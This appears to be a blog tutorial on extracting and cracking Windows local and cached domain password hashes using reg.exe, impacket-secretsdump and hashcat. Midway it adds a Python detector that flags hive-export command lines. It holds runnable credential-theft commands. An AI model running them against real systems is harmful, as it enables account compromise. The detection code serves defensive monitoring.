I wanted to dump hashes on a Windows 10 box without any external tools. This is how I did it with built-in Windows tools, for when you do not have access to mimikatz / hashdump / metasploit. As a bonus we also look at cached domain hashes.
We start with the short version:
- Export the SAM, SECURITY and SYSTEM hives with reg.exe
- Extract the hashes from the exported hives with impacket-secretsdump
- Use hashcat to crack the hashes
First we export the SAM, SECURITY and SYSTEM hives with reg.exe (this needs an elevated prompt, since the hives are only readable by SYSTEM/administrators)
reg.exe save hklm\sam c:\tmp\sam.save
reg.exe save hklm\security c:\tmp\security.save
reg.exe save hklm\system c:\tmp\system.save
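The three hive exports above are exactly the input an offline dumping tool needs, which makes them the thing to alert on. As an added example that is not part of the original post, the following Python flags process-creation command lines that save or export the SAM, SECURITY or SYSTEM hives, and escalates the severity when one host exports all three; the event dict shape (host, user, cmdline) and the sample command lines are constructed, assuming you already collect Sysmon Event ID 1 or Security 4688 with command-line auditing enabled.

```python
import re

# Hives whose export lets an offline tool recover local and cached hashes:
# SAM + SYSTEM for local accounts, SECURITY + SYSTEM for cached domain creds.
SENSITIVE_HIVES = {"sam", "security", "system"}

# reg / reg.exe (optionally quoted, with or without a path) followed by the
# save or export verb and an HKLM path to one of the three credential hives.
REG_SAVE_RE = re.compile(
    r"""(?:^|[\\\s"])reg(?:\.exe)?["\s]+(save|export)\s+"?(hklm|hkey_local_machine)\\(sam|security|system)\b""",
    re.IGNORECASE,
)


def classify_command_line(cmdline):
    """Return the exported hive name in lower case, or None if the command is benign."""
    m = REG_SAVE_RE.search(cmdline)
    return m.group(3).lower() if m else None


def detect_hive_dumps(events):
    """events: iterable of dicts with 'host', 'user', 'cmdline' (constructed shape,
    assumed to come from Sysmon EID 1 or Security 4688 with command-line auditing).
    Returns one finding per matching event; findings on a host that exported all
    three hives (the full secretsdump input set) are raised to 'critical'."""
    findings = []
    hives_by_host = {}
    for ev in events:
        hive = classify_command_line(ev["cmdline"])
        if hive is None:
            continue
        hives_by_host.setdefault(ev["host"], set()).add(hive)
        findings.append({"host": ev["host"], "user": ev["user"], "hive": hive, "severity": "high"})
    for f in findings:
        if hives_by_host[f["host"]] >= SENSITIVE_HIVES:
            f["severity"] = "critical"
    return findings


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\admin", "cmdline": r'reg.exe save hklm\sam c:\tmp\sam.save'},
    {"host": "ws01", "user": "CORP\\admin", "cmdline": r'"C:\Windows\System32\reg.exe" save HKLM\SECURITY c:\tmp\security.save'},
    {"host": "ws01", "user": "CORP\\admin", "cmdline": r'reg save HKEY_LOCAL_MACHINE\System c:\tmp\system.save'},
    {"host": "ws02", "user": "CORP\\dev", "cmdline": r'reg.exe save hklm\software\app c:\tmp\app.save'},
    {"host": "ws02", "user": "CORP\\dev", "cmdline": r'reg.exe query hklm\sam'},
]

if __name__ == "__main__":
    for finding in detect_hive_dumps(SAMPLE_EVENTS):
        print(finding)
```

Only the three ws01 events match; the software hive export and the query on ws02 are ignored, so a real deployment still needs to pair this with alerts on reading the exported files from disk.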
It is time to get the hashes out from these files.
Transfer the files to a machine that has impacket installed. We need to extract the hashes from these three files. I use impacket-secretsdump and write the output to roger.hash (LOCAL tells it to parse the saved hive files instead of connecting to a remote host)
impacket-secretsdump -sam ./sam.save -security ./security.save -system ./system.save LOCAL > roger.hash
Now we have a file roger.hash that contains the local account hashes and the cached domain credentials.
Use hashcat to crack the hashes
For local accounts we copy the hashes into a file local.hash.
For cached accounts we do the same, into cached.hash. Here we strip the leading domain/username prefix from each line so that it begins with $DCC2$, which is the format hashcat expects.
Now it is time to crack the hashes. For local accounts we use -m 1000 (NTLM); for cached accounts we use -m 2100 (Domain Cached Credentials 2).
Cached accounts with a wordlist:
hashcat -m 2100 ./cached.hash /usr/share/wordlists/rockyou.txt
Cached accounts with brute force (-a 3), without supplying a mask file such as guess.mask:
hashcat -m 2100 -a 3 ./cached.hash
The same commands work for local accounts, using local.hash and -m 1000.
I hope this helps someone out there!